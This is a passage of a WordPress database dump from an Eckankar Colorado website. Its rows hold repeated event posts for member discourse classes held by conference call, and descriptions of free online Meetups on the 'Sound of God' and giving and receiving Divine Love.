unfolds your consciousness to the divine within yourself. Each lesson includes a new spiritual exercise and reflective activities. These methods are a step-by-step plan that breaks up old, ingrained patterns and offers new keys to enlightenment.</span></p>','MEMBER CLASS - Letters of Light and Sound 1','','publish','closed','closed','','online-member-class-letters-of-light-and-sound-1-2-2021-04-17','','','2021-01-29 20:52:48','2021-01-30 03:52:48','',263349,'https://eckankar-colorado.org/?post_type=tribe_events&#038;eventDate=2021-04-17#038;p=263349',0,'tribe_events','',0),(263592,2,'2021-01-14 13:24:16','2021-01-14 20:24:16','<p><span style=\"color: #f28a27; font-size: 20pt;\">\"Letters of Light and Sound 1\"</span></p>\r\n<p><span style=\"color: #484848;\"><strong><span style=\"font-size: 14pt;\">- This Class Is Available To Members Of Eckankar-</span><br />\r\n</strong></span></p>\r\n<p><span style=\"font-size: 12pt;\"><strong>NOTE: \'The Letters of Light and Sound 1\' class will be held via conference call.</strong></span></p>\r\n<p><span style=\"font-size: 12pt;\">Eckankar offers unique, year-long, spiritual self-discovery courses. These courses are one of the many benefits that come with <a href=\"https://www.eckankar.org/membership-start/\" target=\"_blank\" rel=\"noopener noreferrer\">ECK membership</a>.</span></p>\r\n<p><span style=\"font-size: 12pt;\">ECK Satsang classes offer a comfortable setting to study the ECK discourses where you can share experiences, insights, and questions. You will learn to recognize your own success with Soul Travel (Out of body experiences), dream travel, and the Light and Sound of God. Through the study of these discourses you can experience a deeper personal relationship with God, get out of karmic debt, and achieve personal liberation in this lifetime.</span></p>\r\n<p><span style=\"font-size: 12pt;\">The ECK discourses are written with an internal rhythm that gradually unfolds your consciousness to the divine within yourself. Each lesson includes a new spiritual exercise and reflective activities. These methods are a step-by-step plan that breaks up old, ingrained patterns and offers new keys to enlightenment.</span></p>','MEMBER CLASS - Letters of Light and Sound 1','','publish','closed','closed','','online-member-class-letters-of-light-and-sound-1-2-2021-05-15','','','2021-01-29 20:52:48','2021-01-30 03:52:48','',263349,'https://eckankar-colorado.org/?post_type=tribe_events&#038;eventDate=2021-05-15#038;p=263349',0,'tribe_events','',0),(263593,2,'2021-01-14 13:24:16','2021-01-14 20:24:16','<p><span style=\"color: #f28a27; font-size: 20pt;\">\"Letters of Light and Sound 1\"</span></p>\r\n<p><span style=\"color: #484848;\"><strong><span style=\"font-size: 14pt;\">- This Class Is Available To Members Of Eckankar-</span><br />\r\n</strong></span></p>\r\n<p><span style=\"font-size: 12pt;\"><strong>NOTE: \'The Letters of Light and Sound 1\' class will be held via conference call.</strong></span></p>\r\n<p><span style=\"font-size: 12pt;\">Eckankar offers unique, year-long, spiritual self-discovery courses. These courses are one of the many benefits that come with <a href=\"https://www.eckankar.org/membership-start/\" target=\"_blank\" rel=\"noopener noreferrer\">ECK membership</a>.</span></p>\r\n<p><span style=\"font-size: 12pt;\">ECK Satsang classes offer a comfortable setting to study the ECK discourses where you can share experiences, insights, and questions. You will learn to recognize your own success with Soul Travel (Out of body experiences), dream travel, and the Light and Sound of God. Through the study of these discourses you can experience a deeper personal relationship with God, get out of karmic debt, and achieve personal liberation in this lifetime.</span></p>\r\n<p><span style=\"font-size: 12pt;\">The ECK discourses are written with an internal rhythm that gradually unfolds your consciousness to the divine within yourself. Each lesson includes a new spiritual exercise and reflective activities. These methods are a step-by-step plan that breaks up old, ingrained patterns and offers new keys to enlightenment.</span></p>','MEMBER CLASS - Letters of Light and Sound 1','','publish','closed','closed','','online-member-class-letters-of-light-and-sound-1-2-2021-06-19','','','2021-01-29 20:52:48','2021-01-30 03:52:48','',263349,'https://eckankar-colorado.org/?post_type=tribe_events&#038;eventDate=2021-06-19#038;p=263349',0,'tribe_events','',0),(263594,2,'2021-01-14 13:24:16','2021-01-14 20:24:16','<p><span style=\"color: #f28a27; font-size: 20pt;\">\"Letters of Light and Sound 1\"</span></p>\r\n<p><span style=\"color: #484848;\"><strong><span style=\"font-size: 14pt;\">- This Class Is Available To Members Of Eckankar-</span><br />\r\n</strong></span></p>\r\n<p><span style=\"font-size: 12pt;\"><strong>NOTE: \'The Letters of Light and Sound 1\' class will be held via conference call.</strong></span></p>\r\n<p><span style=\"font-size: 12pt;\">Eckankar offers unique, year-long, spiritual self-discovery courses. These courses are one of the many benefits that come with <a href=\"https://www.eckankar.org/membership-start/\" target=\"_blank\" rel=\"noopener noreferrer\">ECK membership</a>.</span></p>\r\n<p><span style=\"font-size: 12pt;\">ECK Satsang classes offer a comfortable setting to study the ECK discourses where you can share experiences, insights, and questions. You will learn to recognize your own success with Soul Travel (Out of body experiences), dream travel, and the Light and Sound of God. Through the study of these discourses you can experience a deeper personal relationship with God, get out of karmic debt, and achieve personal liberation in this lifetime.</span></p>\r\n<p><span style=\"font-size: 12pt;\">The ECK discourses are written with an internal rhythm that gradually unfolds your consciousness to the divine within yourself. Each lesson includes a new spiritual exercise and reflective activities. These methods are a step-by-step plan that breaks up old, ingrained patterns and offers new keys to enlightenment.</span></p>','MEMBER CLASS - Letters of Light and Sound 1','','publish','closed','closed','','online-member-class-letters-of-light-and-sound-1-2-2021-07-17','','','2021-01-29 20:52:49','2021-01-30 03:52:49','',263349,'https://eckankar-colorado.org/?post_type=tribe_events&#038;eventDate=2021-07-17#038;p=263349',0,'tribe_events','',0),(263595,2,'2021-01-14 13:24:16','2021-01-14 20:24:16','<p><span style=\"color: #f28a27; font-size: 20pt;\">\"Letters of Light and Sound 1\"</span></p>\r\n<p><span style=\"color: #484848;\"><strong><span style=\"font-size: 14pt;\">- This Class Is Available To Members Of Eckankar-</span><br />\r\n</strong></span></p>\r\n<p><span style=\"font-size: 12pt;\"><strong>NOTE: \'The Letters of Light and Sound 1\' class will be held via conference call.</strong></span></p>\r\n<p><span style=\"font-size: 12pt;\">Eckankar offers unique, year-long, spiritual self-discovery courses. These courses are one of the many benefits that come with <a href=\"https://www.eckankar.org/membership-start/\" target=\"_blank\" rel=\"noopener noreferrer\">ECK membership</a>.</span></p>\r\n<p><span style=\"font-size: 12pt;\">ECK Satsang classes offer a comfortable setting to study the ECK discourses where you can share experiences, insights, and questions. You will learn to recognize your own success with Soul Travel (Out of body experiences), dream travel, and the Light and Sound of God. Through the study of these discourses you can experience a deeper personal relationship with God, get out of karmic debt, and achieve personal liberation in this lifetime.</span></p>\r\n<p><span style=\"font-size: 12pt;\">The ECK discourses are written with an internal rhythm that gradually unfolds your consciousness to the divine within yourself. Each lesson includes a new spiritual exercise and reflective activities. These methods are a step-by-step plan that breaks up old, ingrained patterns and offers new keys to enlightenment.</span></p>','MEMBER CLASS - Letters of Light and Sound 1','','publish','closed','closed','','online-member-class-letters-of-light-and-sound-1-2-2021-08-21','','','2021-01-29 20:52:49','2021-01-30 03:52:49','',263349,'https://eckankar-colorado.org/?post_type=tribe_events&#038;eventDate=2021-08-21#038;p=263349',0,'tribe_events','',0),(263596,2,'2021-01-14 13:24:16','2021-01-14 20:24:16','<p><span style=\"color: #f28a27; font-size: 20pt;\">\"Letters of Light and Sound 1\"</span></p>\r\n<p><span style=\"color: #484848;\"><strong><span style=\"font-size: 14pt;\">- This Class Is Available To Members Of Eckankar-</span><br />\r\n</strong></span></p>\r\n<p><span style=\"font-size: 12pt;\"><strong>NOTE: \'The Letters of Light and Sound 1\' class will be held via conference call.</strong></span></p>\r\n<p><span style=\"font-size: 12pt;\">Eckankar offers unique, year-long, spiritual self-discovery courses. These courses are one of the many benefits that come with <a href=\"https://www.eckankar.org/membership-start/\" target=\"_blank\" rel=\"noopener noreferrer\">ECK membership</a>.</span></p>\r\n<p><span style=\"font-size: 12pt;\">ECK Satsang classes offer a comfortable setting to study the ECK discourses where you can share experiences, insights, and questions. You will learn to recognize your own success with Soul Travel (Out of body experiences), dream travel, and the Light and Sound of God. Through the study of these discourses you can experience a deeper personal relationship with God, get out of karmic debt, and achieve personal liberation in this lifetime.</span></p>\r\n<p><span style=\"font-size: 12pt;\">The ECK discourses are written with an internal rhythm that gradually unfolds your consciousness to the divine within yourself. Each lesson includes a new spiritual exercise and reflective activities. These methods are a step-by-step plan that breaks up old, ingrained patterns and offers new keys to enlightenment.</span></p>','MEMBER CLASS - Letters of Light and Sound 1','','publish','closed','closed','','online-member-class-letters-of-light-and-sound-1-2-2021-09-18','','','2021-01-29 20:52:49','2021-01-30 03:52:49','',263349,'https://eckankar-colorado.org/?post_type=tribe_events&#038;eventDate=2021-09-18#038;p=263349',0,'tribe_events','',0),(263597,2,'2021-01-14 13:24:16','2021-01-14 20:24:16','<p><span style=\"color: #f28a27; font-size: 20pt;\">\"Letters of Light and Sound 1\"</span></p>\r\n<p><span style=\"color: #484848;\"><strong><span style=\"font-size: 14pt;\">- This Class Is Available To Members Of Eckankar-</span><br />\r\n</strong></span></p>\r\n<p><span style=\"font-size: 12pt;\"><strong>NOTE: \'The Letters of Light and Sound 1\' class will be held via conference call.</strong></span></p>\r\n<p><span style=\"font-size: 12pt;\">Eckankar offers unique, year-long, spiritual self-discovery courses. These courses are one of the many benefits that come with <a href=\"https://www.eckankar.org/membership-start/\" target=\"_blank\" rel=\"noopener noreferrer\">ECK membership</a>.</span></p>\r\n<p><span style=\"font-size: 12pt;\">ECK Satsang classes offer a comfortable setting to study the ECK discourses where you can share experiences, insights, and questions. You will learn to recognize your own success with Soul Travel (Out of body experiences), dream travel, and the Light and Sound of God. Through the study of these discourses you can experience a deeper personal relationship with God, get out of karmic debt, and achieve personal liberation in this lifetime.</span></p>\r\n<p><span style=\"font-size: 12pt;\">The ECK discourses are written with an internal rhythm that gradually unfolds your consciousness to the divine within yourself. Each lesson includes a new spiritual exercise and reflective activities. These methods are a step-by-step plan that breaks up old, ingrained patterns and offers new keys to enlightenment.</span></p>','MEMBER CLASS - Letters of Light and Sound 1','','publish','closed','closed','','online-member-class-letters-of-light-and-sound-1-2-2021-10-16','','','2021-01-29 20:52:49','2021-01-30 03:52:49','',263349,'https://eckankar-colorado.org/?post_type=tribe_events&#038;eventDate=2021-10-16#038;p=263349',0,'tribe_events','',0),(263608,2,'2021-01-29 20:45:13','2021-01-30 03:45:13','<p><span style=\"color: #f28a27; font-size: 20pt;\">“Letters of Light and Sound 1”</span></p>\r\n<p><span style=\"color: #484848;\"><strong><span style=\"font-size: 14pt;\">- This Class Is Available To Members Of Eckankar-</span><br />\r\n</strong></span></p>\r\n<p><span style=\"font-size: 12pt;\">Eckankar offers unique, year-long, spiritual self-discovery courses. These courses are one of the many benefits that come with <a href=\"https://www.eckankar.org/membership-start/\" target=\"_blank\" rel=\"noopener noreferrer\">ECK membership</a>.</span></p>\r\n<p><span style=\"font-size: 12pt;\">ECK Satsang classes offer a comfortable setting to study the ECK discourses where you can share experiences, insights, and questions. You will learn to recognize your own success with Soul Travel (Out of body experiences), dream travel, and the Light and Sound of God. Through the study of these discourses you can experience a deeper personal relationship with God, get out of karmic debt, and achieve personal liberation in this lifetime.</span></p>\r\n<p><span style=\"font-size: 12pt;\">The ECK discourses are written with an internal rhythm that gradually unfolds your consciousness to the divine within yourself. Each lesson includes a new spiritual exercise and reflective activities. These methods are a step-by-step plan that breaks up old, ingrained patterns and offers new keys to enlightenment.</span></p>','ONLINE Member Class – Letters of Light and Sound 1','','publish','closed','closed','','online-member-class-letters-of-light-and-sound-1-3','','','2021-01-29 20:45:13','2021-01-30 03:45:13','',0,'https://eckankar-colorado.org/?post_type=tribe_events&#038;p=263608',0,'tribe_events','',0),(263610,2,'2021-01-29 20:51:11','2021-01-30 03:51:11','<p><span style=\"color: #f28a27; font-size: 20pt;\">\"The Master 4 Discourses\"</span></p>\r\n<p><span style=\"color: #484848;\"><strong><span style=\"font-size: 14pt;\">- This Class Is Available To Members Of Eckankar-</span><br />\r\n</strong></span></p>\r\n<p><span style=\"font-size: 12pt;\"><strong>NOTE: ‘The Master 4 Discourses’ class will be held via conference call.</strong></span></p>\r\n<p><span style=\"font-size: 12pt;\">Eckankar offers unique, year-long, spiritual self-discovery courses. These courses are one of the many benefits that come with <a href=\"https://www.eckankar.org/membership-start/\" target=\"_blank\" rel=\"noopener noreferrer\">ECK membership</a>.</span></p>\r\n<p><span style=\"font-size: 12pt;\">ECK Satsang classes offer a comfortable setting to study the ECK discourses where you can share experiences, insights, and questions. You will learn to recognize your own success with Soul Travel (Out of body experiences), dream travel, and the Light and Sound of God. Through the study of these discourses you can experience a deeper personal relationship with God, get out of karmic debt, and achieve personal liberation in this lifetime.</span></p>\r\n<p><span style=\"font-size: 12pt;\">The ECK discourses are written with an internal rhythm that gradually unfolds your consciousness to the divine within yourself. Each lesson includes a new spiritual exercise and reflective activities. These methods are a step-by-step plan that breaks up old, ingrained patterns and offers new keys to enlightenment.</span></p>','MEMBER CLASS - The Master 4 Discourses','','publish','closed','closed','','member-class-the-master-4-discourses','','','2021-01-29 20:56:24','2021-01-30 03:56:24','',0,'https://eckankar-colorado.org/?post_type=tribe_events&#038;p=263610',0,'tribe_events','',0),(263622,2,'2021-01-29 20:51:11','2021-01-30 03:51:11','<p><span style=\"color: #f28a27; font-size: 20pt;\">\"The Master 4 Discourses\"</span></p>\r\n<p><span style=\"color: #484848;\"><strong><span style=\"font-size: 14pt;\">- This Class Is Available To Members Of Eckankar-</span><br />\r\n</strong></span></p>\r\n<p><span style=\"font-size: 12pt;\"><strong>NOTE: ‘The Master 4 Discourses’ class will be held via conference call.</strong></span></p>\r\n<p><span style=\"font-size: 12pt;\">Eckankar offers unique, year-long, spiritual self-discovery courses. These courses are one of the many benefits that come with <a href=\"https://www.eckankar.org/membership-start/\" target=\"_blank\" rel=\"noopener noreferrer\">ECK membership</a>.</span></p>\r\n<p><span style=\"font-size: 12pt;\">ECK Satsang classes offer a comfortable setting to study the ECK discourses where you can share experiences, insights, and questions. You will learn to recognize your own success with Soul Travel (Out of body experiences), dream travel, and the Light and Sound of God. Through the study of these discourses you can experience a deeper personal relationship with God, get out of karmic debt, and achieve personal liberation in this lifetime.</span></p>\r\n<p><span style=\"font-size: 12pt;\">The ECK discourses are written with an internal rhythm that gradually unfolds your consciousness to the divine within yourself. Each lesson includes a new spiritual exercise and reflective activities. These methods are a step-by-step plan that breaks up old, ingrained patterns and offers new keys to enlightenment.</span></p>','MEMBER CLASS - The Master 4 Discourses','','publish','closed','closed','','member-class-the-master-4-discourses-2021-03-16','','','2021-01-29 20:56:24','2021-01-30 03:56:24','',263610,'https://eckankar-colorado.org/?post_type=tribe_events&#038;eventDate=2021-03-16#038;p=263610',0,'tribe_events','',0),(263623,2,'2021-01-29 20:51:11','2021-01-30 03:51:11','<p><span style=\"color: #f28a27; font-size: 20pt;\">\"The Master 4 Discourses\"</span></p>\r\n<p><span style=\"color: #484848;\"><strong><span style=\"font-size: 14pt;\">- This Class Is Available To Members Of Eckankar-</span><br />\r\n</strong></span></p>\r\n<p><span style=\"font-size: 12pt;\"><strong>NOTE: ‘The Master 4 Discourses’ class will be held via conference call.</strong></span></p>\r\n<p><span style=\"font-size: 12pt;\">Eckankar offers unique, year-long, spiritual self-discovery courses. These courses are one of the many benefits that come with <a href=\"https://www.eckankar.org/membership-start/\" target=\"_blank\" rel=\"noopener noreferrer\">ECK membership</a>.</span></p>\r\n<p><span style=\"font-size: 12pt;\">ECK Satsang classes offer a comfortable setting to study the ECK discourses where you can share experiences, insights, and questions. You will learn to recognize your own success with Soul Travel (Out of body experiences), dream travel, and the Light and Sound of God. Through the study of these discourses you can experience a deeper personal relationship with God, get out of karmic debt, and achieve personal liberation in this lifetime.</span></p>\r\n<p><span style=\"font-size: 12pt;\">The ECK discourses are written with an internal rhythm that gradually unfolds your consciousness to the divine within yourself. Each lesson includes a new spiritual exercise and reflective activities. These methods are a step-by-step plan that breaks up old, ingrained patterns and offers new keys to enlightenment.</span></p>','MEMBER CLASS - The Master 4 Discourses','','publish','closed','closed','','member-class-the-master-4-discourses-2021-04-20','','','2021-01-29 20:56:24','2021-01-30 03:56:24','',263610,'https://eckankar-colorado.org/?post_type=tribe_events&#038;eventDate=2021-04-20#038;p=263610',0,'tribe_events','',0),(263624,2,'2021-01-29 20:51:11','2021-01-30 03:51:11','<p><span style=\"color: #f28a27; font-size: 20pt;\">\"The Master 4 Discourses\"</span></p>\r\n<p><span style=\"color: #484848;\"><strong><span style=\"font-size: 14pt;\">- This Class Is Available To Members Of Eckankar-</span><br />\r\n</strong></span></p>\r\n<p><span style=\"font-size: 12pt;\"><strong>NOTE: ‘The Master 4 Discourses’ class will be held via conference call.</strong></span></p>\r\n<p><span style=\"font-size: 12pt;\">Eckankar offers unique, year-long, spiritual self-discovery courses. These courses are one of the many benefits that come with <a href=\"https://www.eckankar.org/membership-start/\" target=\"_blank\" rel=\"noopener noreferrer\">ECK membership</a>.</span></p>\r\n<p><span style=\"font-size: 12pt;\">ECK Satsang classes offer a comfortable setting to study the ECK discourses where you can share experiences, insights, and questions. You will learn to recognize your own success with Soul Travel (Out of body experiences), dream travel, and the Light and Sound of God. Through the study of these discourses you can experience a deeper personal relationship with God, get out of karmic debt, and achieve personal liberation in this lifetime.</span></p>\r\n<p><span style=\"font-size: 12pt;\">The ECK discourses are written with an internal rhythm that gradually unfolds your consciousness to the divine within yourself. Each lesson includes a new spiritual exercise and reflective activities. These methods are a step-by-step plan that breaks up old, ingrained patterns and offers new keys to enlightenment.</span></p>','MEMBER CLASS - The Master 4 Discourses','','publish','closed','closed','','member-class-the-master-4-discourses-2021-05-18','','','2021-01-29 20:56:24','2021-01-30 03:56:24','',263610,'https://eckankar-colorado.org/?post_type=tribe_events&#038;eventDate=2021-05-18#038;p=263610',0,'tribe_events','',0),(263625,2,'2021-01-29 20:51:11','2021-01-30 03:51:11','<p><span style=\"color: #f28a27; font-size: 20pt;\">\"The Master 4 Discourses\"</span></p>\r\n<p><span style=\"color: #484848;\"><strong><span style=\"font-size: 14pt;\">- This Class Is Available To Members Of Eckankar-</span><br />\r\n</strong></span></p>\r\n<p><span style=\"font-size: 12pt;\"><strong>NOTE: ‘The Master 4 Discourses’ class will be held via conference call.</strong></span></p>\r\n<p><span style=\"font-size: 12pt;\">Eckankar offers unique, year-long, spiritual self-discovery courses. These courses are one of the many benefits that come with <a href=\"https://www.eckankar.org/membership-start/\" target=\"_blank\" rel=\"noopener noreferrer\">ECK membership</a>.</span></p>\r\n<p><span style=\"font-size: 12pt;\">ECK Satsang classes offer a comfortable setting to study the ECK discourses where you can share experiences, insights, and questions. You will learn to recognize your own success with Soul Travel (Out of body experiences), dream travel, and the Light and Sound of God. Through the study of these discourses you can experience a deeper personal relationship with God, get out of karmic debt, and achieve personal liberation in this lifetime.</span></p>\r\n<p><span style=\"font-size: 12pt;\">The ECK discourses are written with an internal rhythm that gradually unfolds your consciousness to the divine within yourself. Each lesson includes a new spiritual exercise and reflective activities. These methods are a step-by-step plan that breaks up old, ingrained patterns and offers new keys to enlightenment.</span></p>','MEMBER CLASS - The Master 4 Discourses','','publish','closed','closed','','member-class-the-master-4-discourses-2021-06-15','','','2021-01-29 20:56:24','2021-01-30 03:56:24','',263610,'https://eckankar-colorado.org/?post_type=tribe_events&#038;eventDate=2021-06-15#038;p=263610',0,'tribe_events','',0),(263626,2,'2021-01-29 20:51:11','2021-01-30 03:51:11','<p><span style=\"color: #f28a27; font-size: 20pt;\">\"The Master 4 Discourses\"</span></p>\r\n<p><span style=\"color: #484848;\"><strong><span style=\"font-size: 14pt;\">- This Class Is Available To Members Of Eckankar-</span><br />\r\n</strong></span></p>\r\n<p><span style=\"font-size: 12pt;\"><strong>NOTE: ‘The Master 4 Discourses’ class will be held via conference call.</strong></span></p>\r\n<p><span style=\"font-size: 12pt;\">Eckankar offers unique, year-long, spiritual self-discovery courses. These courses are one of the many benefits that come with <a href=\"https://www.eckankar.org/membership-start/\" target=\"_blank\" rel=\"noopener noreferrer\">ECK membership</a>.</span></p>\r\n<p><span style=\"font-size: 12pt;\">ECK Satsang classes offer a comfortable setting to study the ECK discourses where you can share experiences, insights, and questions. You will learn to recognize your own success with Soul Travel (Out of body experiences), dream travel, and the Light and Sound of God. Through the study of these discourses you can experience a deeper personal relationship with God, get out of karmic debt, and achieve personal liberation in this lifetime.</span></p>\r\n<p><span style=\"font-size: 12pt;\">The ECK discourses are written with an internal rhythm that gradually unfolds your consciousness to the divine within yourself. Each lesson includes a new spiritual exercise and reflective activities. These methods are a step-by-step plan that breaks up old, ingrained patterns and offers new keys to enlightenment.</span></p>','MEMBER CLASS - The Master 4 Discourses','','publish','closed','closed','','member-class-the-master-4-discourses-2021-07-20','','','2021-01-29 20:56:24','2021-01-30 03:56:24','',263610,'https://eckankar-colorado.org/?post_type=tribe_events&#038;eventDate=2021-07-20#038;p=263610',0,'tribe_events','',0),(263627,2,'2021-01-29 20:51:11','2021-01-30 03:51:11','<p><span style=\"color: #f28a27; font-size: 20pt;\">\"The Master 4 Discourses\"</span></p>\r\n<p><span style=\"color: #484848;\"><strong><span style=\"font-size: 14pt;\">- This Class Is Available To Members Of Eckankar-</span><br />\r\n</strong></span></p>\r\n<p><span style=\"font-size: 12pt;\"><strong>NOTE: ‘The Master 4 Discourses’ class will be held via conference call.</strong></span></p>\r\n<p><span style=\"font-size: 12pt;\">Eckankar offers unique, year-long, spiritual self-discovery courses. These courses are one of the many benefits that come with <a href=\"https://www.eckankar.org/membership-start/\" target=\"_blank\" rel=\"noopener noreferrer\">ECK membership</a>.</span></p>\r\n<p><span style=\"font-size: 12pt;\">ECK Satsang classes offer a comfortable setting to study the ECK discourses where you can share experiences, insights, and questions. You will learn to recognize your own success with Soul Travel (Out of body experiences), dream travel, and the Light and Sound of God. Through the study of these discourses you can experience a deeper personal relationship with God, get out of karmic debt, and achieve personal liberation in this lifetime.</span></p>\r\n<p><span style=\"font-size: 12pt;\">The ECK discourses are written with an internal rhythm that gradually unfolds your consciousness to the divine within yourself. Each lesson includes a new spiritual exercise and reflective activities. These methods are a step-by-step plan that breaks up old, ingrained patterns and offers new keys to enlightenment.</span></p>','MEMBER CLASS - The Master 4 Discourses','','publish','closed','closed','','member-class-the-master-4-discourses-2021-08-17','','','2021-01-29 20:56:24','2021-01-30 03:56:24','',263610,'https://eckankar-colorado.org/?post_type=tribe_events&#038;eventDate=2021-08-17#038;p=263610',0,'tribe_events','',0),(263628,2,'2021-01-29 20:51:11','2021-01-30 03:51:11','<p><span style=\"color: #f28a27; font-size: 20pt;\">\"The Master 4 Discourses\"</span></p>\r\n<p><span style=\"color: #484848;\"><strong><span style=\"font-size: 14pt;\">- This Class Is Available To Members Of Eckankar-</span><br />\r\n</strong></span></p>\r\n<p><span style=\"font-size: 12pt;\"><strong>NOTE: ‘The Master 4 Discourses’ class will be held via conference call.</strong></span></p>\r\n<p><span style=\"font-size: 12pt;\">Eckankar offers unique, year-long, spiritual self-discovery courses. These courses are one of the many benefits that come with <a href=\"https://www.eckankar.org/membership-start/\" target=\"_blank\" rel=\"noopener noreferrer\">ECK membership</a>.</span></p>\r\n<p><span style=\"font-size: 12pt;\">ECK Satsang classes offer a comfortable setting to study the ECK discourses where you can share experiences, insights, and questions. You will learn to recognize your own success with Soul Travel (Out of body experiences), dream travel, and the Light and Sound of God. Through the study of these discourses you can experience a deeper personal relationship with God, get out of karmic debt, and achieve personal liberation in this lifetime.</span></p>\r\n<p><span style=\"font-size: 12pt;\">The ECK discourses are written with an internal rhythm that gradually unfolds your consciousness to the divine within yourself. Each lesson includes a new spiritual exercise and reflective activities. These methods are a step-by-step plan that breaks up old, ingrained patterns and offers new keys to enlightenment.</span></p>','MEMBER CLASS - The Master 4 Discourses','','publish','closed','closed','','member-class-the-master-4-discourses-2021-09-21','','','2021-01-29 20:56:25','2021-01-30 03:56:25','',263610,'https://eckankar-colorado.org/?post_type=tribe_events&#038;eventDate=2021-09-21#038;p=263610',0,'tribe_events','',0),(263629,2,'2021-01-29 20:51:11','2021-01-30 03:51:11','<p><span style=\"color: #f28a27; font-size: 20pt;\">\"The Master 4 Discourses\"</span></p>\r\n<p><span style=\"color: #484848;\"><strong><span style=\"font-size: 14pt;\">- This Class Is Available To Members Of Eckankar-</span><br />\r\n</strong></span></p>\r\n<p><span style=\"font-size: 12pt;\"><strong>NOTE: ‘The Master 4 Discourses’ class will be held via conference call.</strong></span></p>\r\n<p><span style=\"font-size: 12pt;\">Eckankar offers unique, year-long, spiritual self-discovery courses. These courses are one of the many benefits that come with <a href=\"https://www.eckankar.org/membership-start/\" target=\"_blank\" rel=\"noopener noreferrer\">ECK membership</a>.</span></p>\r\n<p><span style=\"font-size: 12pt;\">ECK Satsang classes offer a comfortable setting to study the ECK discourses where you can share experiences, insights, and questions. You will learn to recognize your own success with Soul Travel (Out of body experiences), dream travel, and the Light and Sound of God. Through the study of these discourses you can experience a deeper personal relationship with God, get out of karmic debt, and achieve personal liberation in this lifetime.</span></p>\r\n<p><span style=\"font-size: 12pt;\">The ECK discourses are written with an internal rhythm that gradually unfolds your consciousness to the divine within yourself. Each lesson includes a new spiritual exercise and reflective activities. These methods are a step-by-step plan that breaks up old, ingrained patterns and offers new keys to enlightenment.</span></p>','MEMBER CLASS - The Master 4 Discourses','','publish','closed','closed','','member-class-the-master-4-discourses-2021-10-19','','','2021-01-29 20:56:25','2021-01-30 03:56:25','',263610,'https://eckankar-colorado.org/?post_type=tribe_events&#038;eventDate=2021-10-19#038;p=263610',0,'tribe_events','',0),(263641,2,'2021-01-30 09:39:29','2021-01-30 16:39:29','<p><span style=\"font-size: 20pt; color: #f28a27;\">Do you know that the Divine speaks to us through Sound?</span></p>\r\n<p><span style=\"font-size: 20pt; color: #f28a27; line-height: 0.6;\">What is this Sound and how can it help you?</span></p>\r\n<p><span style=\"font-size: 12pt;\"><strong><br />\r\nHave you heard the God sound in your everyday life? Is it always there?</strong></span><br />\r\n<span style=\"font-size: 12pt;\"><strong>Do you know how to tune into the God Sound and the wisdom and love that it brings?</strong></span><br />\r\n<br />\r\n<span style=\"font-size: 12pt;\">Harold Klemp says “It is the sound of all sounds. It is the wind in the leaves, falling rain, thunder of jets, singing of birds, the awful rumble of a tornado. Again Its sound is heard in laughter, weeping, the din of city traffic, ocean waves, and the quiet rippling of a mountain stream.”</span><br />\r\n<br />\r\n<span style=\"font-size: 12pt;\">Come experience the Sound of God for yourself at this Meetup. It is our goal that each of you will have a direct experience with the God sound.</span><br />\r\n<span style=\"font-size: 12pt;\">We will offer multiple exercises to practice hearing the Sound of God. Each exercise will begin with an inspirational quote, followed by a brief discussion after the exercise is completed.</span><br />\r\n<br />\r\n<span style=\"font-size: 12pt;\">You may wish to bring a journal or paper to record your experiences and insights. Take this opportunity to tune into the God Sound in a whole new way!</span><br />\r\n<br />\r\n<span style=\"font-size: 12pt;\">This Meetup group, sponsored by Eckankar as a community service, is a spiritual resource for people of all faiths and beliefs. Eckankar is the Path of Spiritual Freedom. It is an individual, creative practice to experience and explore our own unique relationship with the Divine.</span><br />\r\n<br />\r\n<span style=\"font-size: 12pt;\">To explore a deeper inner connection, check out <a class=\"link\" title=\"www.TheSoundofSoul.org\" href=\"https://www.eckankar.org/experience/hu-the-sound-of-soul/\">TheSoundofSoul.org</a>.</span><br />\r\n<br />\r\n<span style=\"font-size: 12pt;\">The Zoom link will be provided to those members who RSVP that they are attending.</span><br />\r\n<br />\r\n<span style=\"font-size: 12pt;\">There is never a charge for this Meetup.</span></p>\r\n<p>&nbsp;</p>\r\n<p><a class=\"meetupreg\" href=\"https://www.meetup.com/SEGofDenver/events/275451327/\" target=\"_blank\" rel=\"noopener noreferrer\">Register Now!</a></p>','MEETUP ONLINE EVENT<br>TEMPLATE','','publish','closed','closed','','meetup-virtual-online-eventtemplate','','','2021-02-24 20:36:47','2021-02-25 03:36:47','',0,'https://eckankar-colorado.org/?post_type=tribe_events&#038;p=263641',0,'tribe_events','',0),(263643,2,'2021-01-30 09:50:22','2021-01-30 16:50:22','<p><strong><span style=\"font-size: 14pt; color: #666666;\">In your experience, is it easier to give or to receive unconditional love? Why?</span></strong></p>\r\n<p><strong><span style=\"font-size: 14pt; color: #666666; line-height: 0.6;\">How do you give love to yourself?</span></strong></p>\r\n<p><strong><span style=\"font-size: 14pt; color: #666666;\">How does giving bring you closer to God?</span></strong></p>\r\n<p><strong><span style=\"font-size: 14pt; color: #666666;\"> What do you think of the saying: To give is to live?<br />\r\n<br />\r\n</span></strong><span style=\"font-size: 12pt;\">During this Meetup, we will be practicing exercises to experience giving and receiving Divine Love. Along with these techniques, the evening will include contemplation and discussion related to increasing awareness of the unconditional love in our lives. Our goal is that everyone who attends will have an experience of giving and receiving Divine Love.</span></p>\r\n<p><span style=\"font-size: 12pt;\">“By giving love, we become magnets of love.</span><br />\r\n<span style=\"font-size: 12pt;\">The happiest people are those who give and receive love from their families and friends. Now, we’re talking about the “no-strings-attached” kind of love.” <em>The Loving Heart</em>, by Harold Klemp</span></p>\r\n<p><span style=\"font-size: 12pt;\">This Meetup group, sponsored by Eckankar as a community service, is a spiritual resource for people of all faiths and beliefs. Eckankar is the Path of Spiritual Freedom. It is an individual, creative practice to experience and explore our own unique relationship with the Divine.</span></p>\r\n<p><span style=\"font-size: 12pt;\">To explore a deeper inner connection, check out <a class=\"link\" title=\"www.TheSoundofSoul.org\" href=\"https://www.eckankar.org/experience/hu-the-sound-of-soul/\">TheSoundofSoul.org</a>.</span><br />\r\n<br />\r\n<span style=\"font-size: 12pt;\">The Zoom link will be provided to those members who RSVP that they are attending.</span><br />\r\n<br />\r\n<span style=\"font-size: 12pt;\">There is never a charge for this Meetup.</span></p>\r\n<p>&nbsp;</p>\r\n<p><a class=\"meetupreg\" href=\"https://www.meetup.com/SEGofDenver/events/275451327/\" target=\"_blank\" rel=\"noopener noreferrer\">Register Now!</a></p>','MEETUP VIRTUAL ONLINE EVENT - 12 Secrets of Spiritual Living<br>The Spiritual Need for 